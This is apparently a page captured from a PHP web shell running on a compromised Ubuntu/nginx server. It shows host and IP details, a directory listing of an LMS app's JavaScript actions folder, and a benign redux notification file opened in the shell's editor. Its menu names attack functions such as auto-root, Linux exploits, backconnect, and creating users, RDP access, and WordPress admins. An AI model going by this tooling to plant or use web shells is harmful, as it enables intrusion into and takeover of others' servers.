Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.52
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
edu-lms /
app /
edusewa /
actions /
[ HOME SHELL ]
Name
Size
Permission
Action
chatActions.js
406
B
-rw-r--r--
consumerActions.js
1.38
KB
-rw-r--r--
fileActions.js
788
B
-rw-r--r--
lobbyPeerActions.js
655
B
-rw-r--r--
meActions.js
2.17
KB
-rw-r--r--
notificationActions.js
338
B
-rw-r--r--
peerActions.js
2.17
KB
-rw-r--r--
peerVolumeActions.js
120
B
-rw-r--r--
producerActions.js
774
B
-rw-r--r--
requestActions.js
747
B
-rw-r--r--
roomActions.js
4.42
KB
-rw-r--r--
settingsActions.js
2.71
KB
-rw-r--r--
toolareaActions.js
315
B
-rw-r--r--
transportActions.js
129
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : requestActions.js
import randomString from 'random-string'; import * as notificationActions from './notificationActions'; // This returns a redux-thunk action (a function). export const notify = ({ type = 'info', text, timeout }) => { if (!timeout) { switch (type) { case 'info': timeout = 3000; break; case 'error': timeout = 5000; break; default: timeout = 3000; break; } } const notification = { id : randomString({ length: 6 }).toLowerCase(), type : type, text : text, timeout : timeout }; return (dispatch) => { dispatch(notificationActions.addNotification(notification)); setTimeout(() => { dispatch(notificationActions.removeNotification(notification.id)); }, timeout); }; };
Close